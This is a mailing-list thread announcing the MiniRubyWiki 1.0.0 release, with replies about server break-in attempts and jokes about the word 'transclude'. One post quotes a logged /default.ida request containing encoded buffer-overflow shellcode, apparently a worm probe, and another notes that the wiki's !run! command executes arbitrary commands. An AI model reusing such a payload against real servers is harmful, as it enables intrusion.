ANN: MiniRubyWiki 1.0.0

Phlip

Rubies:

A robust, full-featured, and installable MRW is now here:

http://rubyforge.org/projects/minirubywiki

The wiki has a one-click launcher, and can transclude acceptance test
resources in an efficient and streamlined interface.

The wiki also has the most advanced emergent features available in wikidom.
You can import raw text or html into wiki pages, execute commands to
populate wiki pages, and you ran run, organize, and annotate thousands of
pages of test resources. This wiki has been used in production to constrain
all the and characters levels of a large video game.

This page shows the tests in action:

http://www.c2.com/cgi/wiki?MiniRubyWiki

This page describes growing a test fixture from scratch, and plugging it
into the Wiki:

http://flea.sourceforge.net/gameTestServer.pdf

To view all that, on a Win32 platform, extract this file:

http://rubyforge.org/frs/download.php/3748/MiniRubyWiki-1-0-0.zip

Now disable your current web server on port 80, and double-click on
LAUNCH.BAT . Then navigate to http://localhost/TestWikiFormat

Phlip

A robust, full-featured, and installable MRW is now here:

And here's an amusing anecdote. Something on the 'net just tried to crack my
MRW!

fetching:
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Something tried to fetch that URI. If I were instead running the "right"
server, built with fix-length strings, the stuff on the end would have
overrun the string buffer and fallen as opcodes into my server's address
space. Then they'd run when my server returned to their address.

What a world...

Martin Ankerl

And here's an amusing anecdote. Something on the 'net just tried to crack my

There seem to be quite a lot of crackers who automatically scan lots of
of computers for security holes. A few days after they got a list of
computers with possible security holes they come back and really crack
them. If your machine allows SSH access over the net, grep for "Invalid
user" or "POSSIBLE BREAKIN ATTEMPT" in your log files under /var/log/sshd.
I have recently become aware of this, because I accidently had a user
with the name and password set to 'chris'. So one of these crackers had
the luck to guess this account, and got onto my machine. I was lucky
enough to recognize this before he could get root.

martinus

Phlip

Martin said:
There seem to be quite a lot of crackers who automatically scan lots of
of computers for security holes. A few days after they got a list of
computers with possible security holes they come back and really crack
them. If your machine allows SSH access over the net, grep for "Invalid
user" or "POSSIBLE BREAKIN ATTEMPT" in your log files under /var/log/sshd.
I have recently become aware of this, because I accidently had a user
with the name and password set to 'chris'. So one of these crackers had
the luck to guess this account, and got onto my machine. I was lucky
enough to recognize this before he could get root.

I use Win32, and MRW uses either a CGI server or its own built-in server,
which can't report cracks. Except by casually streaming what it is fetching.

I think I must disrecommend running MRW on port 80 with only a home
computer's firewall. MRW cannot be cracked, but you CAN hit it and write a
wiki page with a !run! command that does anything I can do from a command
prompt!

Y'all can run it at work, behind a real firewall that blocks your port.

Jay Levitt

A robust, full-featured, and installable MRW is now here:

Excellent! I have been considering hieriki... could you possibly
provide a brief comparison?

Lyle Johnson

The wiki has a one-click launcher, and can transclude acceptance test
resources in an efficient and streamlined interface.

This sounds great. Just last night I was telling the wife that I'd
been looking for a Wiki that could transclude acceptance test
resources.

Hal Fulton

Lyle said:
This sounds great. Just last night I was telling the wife that I'd
been looking for a Wiki that could transclude acceptance test
resources.

Gosh, Lyle... it may take surgery to remove
your tongue from your cheek...

Hal

Lyle Johnson

Gosh, Lyle... it may take surgery to remove
your tongue from your cheek...

I still don't know what "transclude" means since it's not in any
dictionary. For all I know, my acceptance test resources have already
been transcluded and I missed it.